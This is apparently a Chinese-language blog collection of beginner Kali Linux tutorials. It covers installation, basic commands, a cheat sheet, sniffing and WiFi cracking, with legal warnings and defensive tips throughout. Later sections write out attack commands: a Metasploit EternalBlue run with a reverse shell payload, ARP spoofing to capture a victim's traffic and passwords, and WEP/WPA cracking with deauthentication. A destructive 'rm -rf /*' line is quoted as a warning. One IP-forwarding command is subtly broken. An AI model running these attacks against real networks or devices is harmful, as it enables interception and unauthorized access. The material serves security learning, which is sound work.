Kali Linux初学者入门保姆教程

admin

# Kali Linux初学者入门保姆教程

## 第一章：认识Kali Linux

### 1.1 什么是Kali Linux？
Kali Linux是一个基于Debian的Linux发行版，专门为数字取证和渗透测试而设计。它由Offensive Security公司维护和资助，前身是BackTrack Linux。

**重要提醒**：
- Kali Linux是专业的网络安全工具，**仅用于合法授权的安全测试**
- 未经授权使用可能违反法律
- 建议在受控环境中学习使用

### 1.2 Kali Linux的主要特点
- 包含600+安全测试工具
- 免费且开源
- 支持多种硬件平台
- 定期更新工具和内核
- 多语言支持

## 第二章：安装Kali Linux

### 2.1 安装前的准备

**系统要求**：
- 至少20GB硬盘空间
- 2GB RAM（推荐4GB以上）
- 支持网络安装或USB启动

**下载方式**：
1. 访问官方网站：https://www.kali.org
2. 选择适合的版本（推荐初学者使用完整版ISO）

### 2.2 三种安装方式

#### 方式一：虚拟机安装（推荐初学者）
**使用VMware或VirtualBox**：
1. 下载并安装虚拟机软件
2. 创建新虚拟机
3. 选择Kali Linux ISO文件
4. 分配资源（建议：2核CPU，4GB RAM，40GB硬盘）
5. 启动安装

#### 方式二：双系统安装
1. 准备U盘（至少8GB）
2. 使用Rufus或Etcher制作启动盘
3. 调整BIOS/UEFI设置
4. 分区安装

#### 方式三：云平台安装
- AWS、Azure等云平台提供Kali Linux镜像
- 适合远程学习和测试

## 第三章：首次启动和基本配置

### 3.1 初始设置

**登录信息**：
- 默认用户名：`kali`
- 默认密码：`kali`

**首次启动后必做事项**：

```bash
# 1. 更新系统
sudo apt update
sudo apt upgrade -y

# 2. 安装完整工具包（可选）
sudo apt install kali-linux-large

# 3. 设置root密码
sudo passwd root

# 4. 配置网络
# 图形界面：右上角网络图标
# 命令行：nmtui
```

### 3.2 桌面环境熟悉

Kali Linux默认使用Xfce桌面环境：
- **应用程序菜单**：左上角Kali图标
- **终端**：最重要的工具，快捷键`Ctrl+Alt+T`
- **文件管理器**：Thunar
- **设置中心**：系统配置

## 第四章：Linux基础命令

### 4.1 必须掌握的命令

```bash
# 文件和目录操作
ls          # 列出目录内容
cd          # 切换目录
pwd         # 显示当前目录
mkdir       # 创建目录
rm          # 删除文件
cp          # 复制文件
mv          # 移动/重命名文件

# 文件查看和编辑
cat         # 查看文件内容
nano        # 简单文本编辑器
vim         # 高级文本编辑器
less        # 分页查看文件

# 系统信息
uname -a    # 系统信息
whoami      # 当前用户
df -h       # 磁盘使用情况
free -h     # 内存使用情况

# 权限管理
chmod       # 修改权限
chown       # 修改所有者
sudo        # 以root权限执行
```

### 4.2 实用技巧
```bash
# 使用Tab键自动补全
# 使用上下箭头查看历史命令
# Ctrl+C 终止当前命令
# Ctrl+Z 暂停进程
```

## 第五章：Kali Linux核心工具介绍

### 5.1 信息收集工具

**Nmap** - 网络扫描器
```bash
# 基本扫描
nmap 192.168.1.1

# 详细扫描
nmap -A 192.168.1.1

# 端口扫描
nmap -p 1-1000 192.168.1.1
```

**Recon-ng** - Web侦察框架
```bash
recon-ng
marketplace install all
workspaces create test
```

### 5.2 漏洞分析工具

**Nessus** - 漏洞扫描器
- 需要注册获取激活码
- 图形界面操作简单

**OpenVAS** - 开源漏洞扫描器
```bash
sudo openvas-setup
sudo openvas-start
# 访问 https://127.0.0.1:9392
```

### 5.3 密码攻击工具

**John the Ripper** - 密码破解
```bash
# 基本使用
john --wordlist=password.lst hash.txt
```

**Hashcat** - 高级密码恢复
```bash
hashcat -m 0 -a 0 hash.txt wordlist.txt
```

### 5.4 无线攻击工具

**Aircrack-ng套件**
```bash
# 查看无线网卡
airmon-ng

# 开启监控模式
airmon-ng start wlan0

# 抓包
airodump-ng wlan0mon
```

## 第六章：实际演练环境搭建

### 6.1 创建测试实验室

**推荐靶机**：
1. **Metasploitable2**：故意存在漏洞的Linux系统
2. **DVWA**：Damn Vulnerable Web Application
3. **OWASP Broken Web Apps**

**安装Metasploitable2**：
```bash
# 下载
wget https://downloads.sourceforge.net/project/metasploitable/Metasploitable2/metasploitable-linux-2.0.0.zip

# 解压并在虚拟机中运行
```

### 6.2 合法测试授权

**必须遵守的原则**：
1. 只测试自己拥有或获得书面授权的系统
2. 在隔离环境中练习
3. 记录所有测试活动
4. 尊重隐私和数据保护法律

## 第七章：Metasploit框架入门

### 7.1 启动Metasploit
```bash
# 启动服务
sudo systemctl start postgresql
sudo msfdb init

# 启动框架
msfconsole
```

### 7.2 基本使用流程
```bash
msf6 > search eternalblue      # 搜索漏洞
msf6 > use exploit/windows/smb/ms17_010_eternalblue  # 使用模块
msf6 > show options            # 查看选项
msf6 > set RHOSTS 192.168.1.100 # 设置目标
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp  # 设置载荷
msf6 > exploit                 # 执行攻击
```

## 第八章：Wireshark网络分析

### 8.1 基本使用
```bash
# 启动Wireshark
sudo wireshark

# 命令行版本
tshark -i eth0
```

### 8.2 常用过滤规则
```
# 显示HTTP流量
http

# 显示特定IP
ip.addr == 192.168.1.1

# 显示TCP端口80
tcp.port == 80

# 组合过滤
http and ip.src == 192.168.1.100
```

## 第九章：安全编程基础

### 9.1 Python安全脚本
```python
#!/usr/bin/env python3
# 简单的端口扫描器

import socket
import sys

def port_scan(host, port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        result = sock.connect_ex((host, port))
        if result == 0:
            print(f"Port {port}: OPEN")
        sock.close()
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target = sys.argv[1]
    for port in range(1, 1025):
        port_scan(target, port)
```

### 9.2 Bash脚本自动化
```bash
#!/bin/bash
# 自动化信息收集脚本

echo "目标IP: $1"
echo "=== 开始扫描 ==="

# Ping测试
ping -c 4 $1

# Nmap扫描
nmap -sV -O $1

# 目录爆破（如果有Web服务）
dirb http://$1
```

## 第十章：最佳实践和安全建议

### 10.1 系统安全加固
```bash
# 1. 定期更新
sudo apt update && sudo apt upgrade

# 2. 修改默认密码
passwd
sudo passwd root

# 3. 配置防火墙
sudo apt install ufw
sudo ufw enable
sudo ufw allow ssh

# 4. 禁用不必要的服务
sudo systemctl disable [service-name]
```

### 10.2 学习资源推荐

**官方资源**：
- Kali Linux官方文档：https://www.kali.org/docs/
- Offensive Security培训：https://www.offensive-security.com/

**在线平台**：
- Hack The Box
- TryHackMe
- VulnHub

**书籍推荐**：
- 《Kali Linux高级渗透测试》
- 《Metasploit渗透测试指南》

## 第十一章：故障排除

### 常见问题解决

**网络问题**：
```bash
# 检查网络连接
ip a
ping 8.8.8.8

# 重启网络服务
sudo systemctl restart NetworkManager
```

**工具无法运行**：
```bash
# 检查依赖
apt-cache depends [tool-name]

# 重新安装
sudo apt install --reinstall [tool-name]
```

**虚拟机问题**：
- 确保安装VMware Tools/VirtualBox增强功能
- 检查网络适配器设置
- 分配足够的内存和CPU资源

## 结语

Kali Linux是一个强大的安全工具平台，但能力越大责任越大。请记住：

1. **永远在合法授权范围内使用**
2. **持续学习，技术更新很快**
3. **加入社区，分享知识**
4. **保持好奇心，但要有道德底线**

学习路径建议：
1. 掌握Linux基础知识
2. 熟悉网络协议
3. 学习编程基础（Python/Bash）
4. 从CTF和合法靶场开始练习
5. 考取相关认证（如OSCP）

祝你在网络安全的学习道路上顺利前行！记住，这是一个需要终身学习的领域，保持热情，坚持实践，你一定会有所成就。

**免责声明**：本教程仅供教育目的，作者不对任何非法使用承担责任。使用者必须遵守当地法律法规。

admin

Kali Linux 初学者入门保姆级教程（2026 最新）
Kali Linux 是基于 Debian 的网络安全 / 渗透测试专用系统，预装 Nmap、Wireshark、Metasploit 等数百款安全工具。新手建议虚拟机安装（零风险、不破坏原系统、支持快照回滚），以下从安装到基础使用全程手把手教学。
一、安装前准备（新手必看）
1. 硬件 / 软件要求
电脑配置：内存≥8GB（虚拟机至少分配 4GB）、硬盘≥50GB 空闲空间
虚拟机软件：VMware Workstation Pro（推荐，免费试用 30 天）或 VirtualBox（免费）
Kali 镜像：官方 64 位 Installer（GNOME 图形版），约 4.5GB
官网下载：https://www.kali.org/downloads/
避坑：别下精简版、修改版、Live 版，缺工具易报错
2. 虚拟机安装（VMware 为例）
安装 VMware：一路 "下一步"，安装位置选 D 盘，完成后重启
新建虚拟机
点击 "创建新的虚拟机" → 选 "典型（推荐）" → 下一步
选择 "稍后安装操作系统" → 下一步
客户机系统：Linux → Debian 12.x 64 位
命名虚拟机（如 Kali-2026）、存储位置选 D 盘
磁盘容量：20GB+，选 "将虚拟磁盘存储为单个文件" → 完成
编辑虚拟机设置（关键）
内存：4096MB（4GB）
处理器：2 核、2 线程
CD/DVD：选 "使用 ISO 映像文件" → 浏览选中下载的 Kali ISO
网络适配器：选NAT 模式（新手最稳）
二、Kali 系统安装（图文步骤）
开启虚拟机 → 启动菜单选 Graphical install（图形化安装）


语言 / 区域：中文（简体）→ 中国 → 汉语键盘
网络配置
主机名：填 kali（自定义也可）
域名：留空 → 继续
设置用户与密码（新版禁用 root 直接登录）
全名：kali → 用户名：kali
密码：务必记住（如 kali123）
磁盘分区（新手直接照抄）
选 "向导 - 使用整个磁盘"
选中唯一磁盘 → "将所有文件放在同一个分区"
完成分区 → 选 "是" 写入磁盘
软件选择：保持默认（XFee/GNOME + 标准工具集） → 等待 10-20 分钟
安装 GRUB：选 "是" → 设备选 /dev/sda
安装完成 → 重启 → 登录（账号kali，密码你设置的）
三、首次开机必做配置（新手必做）
1. 切换 root 权限（工具常用，安全提醒：谨慎操作）
bash
运行
# 设置root密码
sudo passwd root  # 输入当前用户密码 → 设root新密码

# 切换到root
su - root  # 输入root密码
# 或临时提权
sudo 命令  # 如 sudo nmap
2. 更换国内软件源（解决下载慢 / 失败）
bash
运行
# 编辑源文件
sudo nano /etc/apt/sources.list

# 注释原有内容，粘贴阿里云源（2026可用）
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

# 保存退出：Ctrl+O → 回车 → Ctrl+X
3. 更新系统（必做）
bash
运行
sudo apt update  # 更新软件列表
sudo apt upgrade -y  # 升级所有包（耐心等）
sudo apt autoremove  # 清理无用包
4. 基础工具安装（可选）
bash
运行
# 中文输入法（搜狗/ibus）
sudo apt install ibus ibus-pinyin -y

# 常用工具
sudo apt install tree htop neofetch -y
四、新手必会 Linux 基础命令（高频）
1. 文件 / 目录操作（90% 场景）
bash
运行
pwd          # 查看当前路径（定位自己）
ls           # 查看文件
ls -la       # 查看所有文件（含隐藏+权限）
cd 目录      # 切换目录（cd .. 上一级、cd ~ 主页、cd / 根目录）
mkdir 目录   # 新建文件夹
touch 文件   # 新建空文件
cp 源 目标   # 复制
mv 源 目标   # 移动/重命名
rm 文件      # 删除文件（慎用！）
rm -r 目录   # 递归删目录
rm -rf /*    # 删根目录（自杀命令，绝对别碰！）
2. 系统 / 权限命令
bash
运行
sudo 命令    # 临时管理员权限
chmod 755 文件 # 改权限（读4写2执行1）
ps -aux      # 查看进程
kill 进程ID  # 结束进程
reboot       # 重启
shutdown now # 关机
3. 网络命令（安全入门核心）
bash
运行
ip a         # 查看IP/网卡（替代ifconfig）
ping 域名/IP # 测试网络（ping www.baidu.com）
netstat -ntlp # 查看开放端口
nmap 目标IP  # 端口扫描（安全工具）
4. 包管理（安装 / 卸载软件）
bash
运行
sudo apt install 软件名  # 安装
sudo apt remove 软件名   # 卸载
sudo apt search 关键词   # 搜索软件
五、Kali 安全工具入门（新手先练这 3 个）
1. Nmap（端口扫描，最基础）
bash
运行
# 扫描靶机（自己虚拟机/靶场）
nmap 192.168.1.100  # 扫常见端口
nmap -sV 192.168.1.100  # 扫端口+服务版本
nmap -A 192.168.1.100    # 全面扫描（新手慎用外网）
2. Wireshark（流量抓包）
启动：菜单 → 09 - 嗅探 / 欺骗 → Wireshark
选择网卡（如 eth0）→ 开始抓包 → 过滤 HTTP/TCP
3. Metasploit（漏洞利用框架）
bash
运行
# 启动数据库
sudo msfdb init
# 启动控制台
msfconsole
六、新手避坑指南（90% 人踩过）
忘记 root 密码
重启 → GRUB 按e → 找到linux行末尾加init=/bin/bash → Ctrl+X
输入 passwd root → 设新密码 → 重启
无法联网 / 网络异常
虚拟机：检查网络设为 NAT → 重启虚拟机
命令：sudo systemctl restart NetworkManager
工具启动失败
大多是没开 root → 用sudo或切换root执行
更新报错 / 依赖冲突
换国内源 → sudo apt update --fix-missing
法律红线（绝对不能碰）
仅可测试自己的设备 / 授权项目
非法渗透他人系统 / 网络：违反《网络安全法》《刑法》，违法犯罪
七、学习路线（新手 1-3 个月）
第 1 个月：Linux 基础
熟练命令、文件系统、权限、网络配置
第 2 个月：工具入门
Nmap、Wireshark、Burp Suite、SQLmap
第 3 个月：靶场实战
搭建 DVWA、WebGoat、Metasploitable3 练习
八、常用快捷键
终端：Ctrl+Alt+T
复制 / 粘贴：Ctrl+Shift+C/V
清屏：Ctrl+L
中断命令：Ctrl+C

admin

Kali Linux 常用命令速查表
整理了新手高频使用命令，分类清晰可直接保存使用，同时标注使用禁忌⚠️
一、系统基础命令
表格
命令        作用
sudo -i        切换至 root 管理员权限
passwd        修改当前用户密码
sudo passwd root        设置 root 账户密码
reboot        重启系统
shutdown now        立即关机
neofetch        查看系统信息
htop        可视化查看系统进程
二、文件目录操作
表格
命令        作用
pwd        显示当前所在路径
ls        列出目录文件
ls -la        查看所有文件含隐藏文件
cd 目录名        进入指定目录
cd ..        返回上一级目录
mkdir 文件夹名        创建文件夹
touch 文件名        创建空文件
cp 源文件 目标路径        复制文件
mv 源文件 目标路径        移动 / 重命名文件
rm 文件名        删除文件
rm -r 文件夹        删除文件夹
⚠️ 绝对禁止执行：rm -rf /* 会彻底摧毁系统
三、文件编辑与查看
表格
命令        作用
nano 文件名        简易文本编辑器
cat 文件名        查看文件全部内容
head 文件名        查看文件开头
tail 文件名        查看文件结尾
grep 关键词 文件名        搜索文件内容
nano 操作：Ctrl+O保存，Ctrl+X退出
四、网络管理命令
表格
命令        作用
ip a        查看本机 IP 与网卡信息
ping IP/域名        测试网络连通性
ifconfig        传统网卡配置工具
netstat -ntlp        查看端口占用情况
sudo systemctl restart NetworkManager        重启网络服务
五、软件包管理
表格
命令        作用
apt update        更新软件源列表
apt upgrade -y        升级所有可更新软件
apt install 软件名        安装软件
apt remove 软件名        卸载软件
apt search 关键词        搜索软件
apt autoremove        清理无用依赖包
六、渗透测试核心工具
表格
命令        作用
nmap IP        基础端口扫描
nmap -sV IP        扫描服务版本
wireshark        启动流量抓包工具
msfdb init        初始化 msf 数据库
msfconsole        启动 Metasploit 框架
sqlmap -u URL        SQL 注入检测
七、权限与进程管理
表格
命令        作用
chmod 权限值 文件        修改文件权限
ps aux        查看所有进程
kill 进程ID        终止指定进程
kill -9 进程ID        强制终止进程
八、终端快捷键
表格
快捷键        功能
Ctrl+Alt+T        快速打开终端
Ctrl+Shift+C/V        复制粘贴
Ctrl+C        终止当前运行命令
Ctrl+L        清空终端屏幕
Tab        自动补全命令 / 文件名
⚠️ 重要法律提示
所有渗透工具仅可用于自身设备、授权靶场测试，未经许可扫描攻击他人网络属于违法行为！

admin

Kali Linux 实用使用技巧
一、终端效率提升技巧
命令自动补全强化
按Tab一键补全命令、文件名，连续按两次Tab展示所有候选，大幅减少输入错误
快速调用历史命令
按上下方向键翻阅历史指令
输入history查看所有历史命令
!编号直接执行对应历史命令
终端分屏操作
安装工具tmux，实现一个窗口分多终端，同时运行扫描、抓包等任务
bash
运行
sudo apt install tmux -y
二、账户与权限技巧
免密码使用 sudo
编辑配置文件，避免频繁输入密码，适合个人虚拟机使用
bash
运行
sudo visudo
# 在文件末尾添加
kali ALL=(ALL) NOPASSWD:ALL
快速切换 root
sudo -i 直接切换 root，比su root更便捷
三、软件与源优化技巧
快速修复依赖错误
更新软件报错时，一键修复依赖问题
bash
运行
sudo apt -f install
清理系统冗余
释放磁盘空间，保持系统流畅
bash
运行
sudo apt clean && sudo apt autoremove
四、网络渗透实用小技巧
Nmap 扫描提速
添加参数缩短扫描时间，适合内网测试
bash
运行
nmap -F IP #快速扫描常用端口
复制终端命令输出
配合管道命令，直接将结果复制到剪贴板
bash
运行
ip a | xclip -selection clipboard
快速查看开放端口
替代复杂命令，直观查看本机服务端口
bash
运行
ss -tuln
五、系统操作便捷技巧
文件快速搜索
locate 文件名极速查找文件，使用前更新数据库
bash
运行
sudo updatedb
强制卸载卡死程序
工具无响应时，强制结束进程
bash
运行
xkill #点击卡死窗口即可关闭
截图快捷键
PrintScreen全屏截图，Alt+PrintScreen截取当前窗口
六、虚拟机专属优化
开启共享文件夹
实现主机与 Kali 文件互传，无需 U 盘传输
创建快照
配置好环境后拍摄快照，系统崩溃一键恢复，新手必备
七、安全工具使用小贴士
Metasploit 加速启动
提前初始化数据库，避免启动卡顿
Wireshark 普通用户使用
赋予普通用户抓包权限，无需切换 root
bash
运行
sudo usermod -aG wireshark kali
八、禁忌与安全提醒
切勿对外网 IP 随意扫描，仅用于自有设备与授权靶场
不随意下载未知第三方工具，避免系统被植入后门
rm -rf 命令谨慎使用，严防误删系统文件

admin

结合合法合规前提，我为你整理 Kali Linux 下最常用的网络嗅探工具使用方法，仅可用于你自有网络或已获得书面授权的测试环境，非法嗅探他人网络属于违法行为⚠️
Kali Linux 网络嗅探实战教程
网络嗅探核心是抓取网络数据包，分析流量内容，常用工具：Wireshark、Tcpdump
前置知识：网卡监听模式
普通网卡仅接收发给自己的数据包，嗅探局域网流量需要开启混杂模式
bash
运行
# 查看网卡名称
ip a
# 开启网卡混杂模式，以eth0为例
sudo ifconfig eth0 promisc
# 关闭混杂模式
sudo ifconfig eth0 -promisc
一、可视化嗅探：Wireshark（新手首选）
启动方式
bash
运行
sudo wireshark
选择网卡
以太网选择eth0，无线选择wlan0
双击网卡开始抓包
核心使用技巧
流量过滤
仅显示 HTTP 流量：http
仅显示目标 IP 流量：ip.addr == 192.168.1.100
筛选 TCP 端口：tcp.port == 80
右键数据包 → 追踪流 → TCP 流，可查看明文传输的账号密码
二、命令行嗅探：Tcpdump（无图形界面必备）
适用于服务器、轻量环境，功能强大
bash
运行
# 基础抓包，监听eth0网卡
sudo tcpdump -i eth0

# 抓取指定IP的数据包
sudo tcpdump -i eth0 host 192.168.1.100

# 抓取80端口流量并保存到文件
sudo tcpdump -i eth0 port 80 -w traffic.pcap

# 读取保存的抓包文件
sudo tcpdump -r traffic.pcap

# 抓取TCP协议数据包
sudo tcpdump -i eth0 tcp
三、无线局域网嗅探（额外步骤）
无线嗅探需要开启监听模式
bash
运行
# 关闭网络管理器
sudo systemctl stop NetworkManager
# 设置网卡为监听模式
sudo airmon-ng start wlan0
# 此时网卡名称变为wlan0mon，即可用工具抓无线流量
四、ARP 欺骗（嗅探同局域网其他设备流量）
局域网内设备默认不互发数据，需用arpspoof转发流量
安装工具
bash
运行
sudo apt install dsniff -y
开启流量转发
bash
运行
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
执行 ARP 欺骗
bash
运行
# 冒充网关，欺骗靶机
sudo arpspoof -i eth0 -t 靶机IP 网关IP
# 新开终端，冒充靶机，欺骗网关
sudo arpspoof -i eth0 -t 网关IP 靶机IP
开启 Wireshark 即可捕获靶机所有流量
五、重要合规与安全提醒
法律红线
未经授权对公共网络、他人设备进行嗅探、ARP 欺骗，违反《网络安全法》，需承担法律责任
防护建议
使用 HTTPS 加密网站可防止密码被嗅探，局域网可使用 ARP 防火墙抵御欺骗
嗅探完成后，及时关闭网卡混杂模式与 IP 转发

admin

重要警示
未经授权破解、攻击、入侵任何无线网络均属于严重违法行为，违反《中华人民共和国网络安全法》《刑法》等相关法律，需承担刑事责任！
以下内容仅用于学习网络安全防护知识，测试你本人拥有所有权的 WiFi 网络，切勿用于非法用途⚠️
一、Kali 无线攻击基础前置操作
1. 查看无线网卡
需支持监听模式的无线网卡（内置网卡很多不支持，推荐外置 USB 网卡）
bash
运行
iwconfig
网卡名称通常为wlan0
2. 开启监听模式
bash
运行
# 关闭干扰进程
sudo airmon-ng check kill
# 开启监听模式，网卡变为wlan0mon
sudo airmon-ng start wlan0
3. 扫描周边 WiFi 网络
bash
运行
sudo airodump-ng wlan0mon
扫描后记录关键信息：
BSSID：路由器 MAC 地址
CH：信道
ESSID：WiFi 名称
二、针对 WEP 加密 WiFi（老旧加密，极易破解）
锁定目标网络抓包
bash
运行
sudo airodump-ng -c 信道 --bssid 路由器MAC -w wep wlan0mon
新终端发起认证碰撞，获取足够数据包
bash
运行
sudo aireplay-ng -3 -b 路由器MAC wlan0mon
数据包收集完成后破解密码
bash
运行
sudo aircrack-ng wep-01.cap
三、针对 WPA/WPA2 加密 WiFi（主流加密方式）
该方式依赖抓取四次握手包，且需要配合字典暴力破解
抓握手包
bash
运行
sudo airodump-ng -c 信道 --bssid 路由器MAC -w wpa wlan0mon
新终端强制断开已连接设备，触发重连获取握手包
bash
运行
sudo aireplay-ng -0 2 -a 路由器MAC wlan0mon
字典爆破密码
bash
运行
sudo aircrack-ng -w 字典路径 wpa-01.cap
四、WPA3 加密说明
WPA3 安全性大幅提升，常规无线攻击手段几乎无法破解，是目前主流安全加密方案
五、防御建议（学习防护更有意义）
路由器使用WPA3 加密，关闭 WPS 功能
设置高强度密码，包含大小写、数字、特殊符号
隐藏 WiFi 名称，绑定设备 MAC 地址
定期更新路由器固件
六、再次强调
攻击他人无线网络属于违法犯罪行为，会被依法追责
无线安全研究请在专业实验室、自有设备中进行
学会攻击是为了更好地防护，而非作恶